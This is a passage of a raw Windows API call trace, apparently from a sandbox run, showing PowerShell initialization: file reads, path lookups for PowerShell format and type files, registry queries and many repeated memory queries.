lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.005] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.005] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.006] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.006] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1000, lpOverlapped=0x0) returned 1 [0078.006] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x1b4, lpOverlapped=0x0) returned 1 [0078.007] ReadFile (in: hFile=0x338, lpBuffer=0x2d658f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf88, lpOverlapped=0x0 | out: lpBuffer=0x2d658f8*, lpNumberOfBytesRead=0xccf88*=0x0, lpOverlapped=0x0) returned 1 [0078.007] CloseHandle (hObject=0x338) returned 1 [0078.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0078.007] SetErrorMode (uMode=0x1) returned 0x1 [0078.007] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0078.007] SetErrorMode (uMode=0x1) returned 0x1 [0078.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0078.008] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x338) returned 0x0 [0078.008] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0 [0078.008] CoTaskMemAlloc (cb=0x5a) returned 0x16efc0 [0078.008] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x16efc0, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0 [0078.008] CoTaskMemFree (pv=0x16efc0) [0078.008] RegCloseKey (hKey=0x338) returned 0x0 [0078.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0078.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0078.244] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.250] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.251] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.252] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.253] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.254] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.254] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.255] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.261] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.261] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.261] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.261] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.262] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.262] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.262] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.262] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.266] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.271] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.271] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.272] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.272] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.273] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.273] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.273] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.273] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.274] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.274] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.274] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.274] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.275] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.278] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.280] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.280] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.280] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.282] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.299] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.300] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.300] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.304] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0078.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0078.304] CoTaskMemFree (pv=0x1ef6c0) [0078.306] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.320] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.321] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.322] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.322] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.323] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.323] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.325] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.327] VirtualQuery (in: lpAddress=0xcbcd0, lpBuffer=0xccb90, dwLength=0x30 | out: lpBuffer=0xccb90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.328] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x30c) returned 0x0 [0078.329] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0xcd19c, lpData=0x0, lpcbData=0xcd198*=0x0 | out: lpType=0xcd19c*=0x1, lpData=0x0, lpcbData=0xcd198*=0x74) returned 0x0 [0078.329] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0xcd10c, lpData=0x0, lpcbData=0xcd108*=0x0 | out: lpType=0xcd10c*=0x1, lpData=0x0, lpcbData=0xcd108*=0x74) returned 0x0 [0078.329] CoTaskMemAlloc (cb=0x78) returned 0x195a00 [0078.329] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0xcd0dc, lpData=0x195a00, lpcbData=0xcd0d8*=0x74 | out: lpType=0xcd0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd0d8*=0x74) returned 0x0 [0078.329] CoTaskMemFree (pv=0x195a00) [0078.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0078.329] SetErrorMode (uMode=0x1) returned 0x1 [0078.329] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0078.329] SetErrorMode (uMode=0x1) returned 0x1 [0078.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.331] SetErrorMode (uMode=0x1) returned 0x1 [0078.331] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0078.331] SetErrorMode (uMode=0x1) returned 0x1 [0078.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0078.332] SetErrorMode (uMode=0x1) returned 0x1 [0078.332] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0078.332] SetErrorMode (uMode=0x1) returned 0x1 [0078.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.332] SetErrorMode (uMode=0x1) returned 0x1 [0078.332] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0078.332] SetErrorMode (uMode=0x1) returned 0x1 [0078.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0078.333] SetErrorMode (uMode=0x1) returned 0x1 [0078.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0078.333] SetErrorMode (uMode=0x1) returned 0x1 [0078.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0078.333] SetErrorMode (uMode=0x1) returned 0x1 [0078.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0078.333] SetErrorMode (uMode=0x1) returned 0x1 [0078.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", 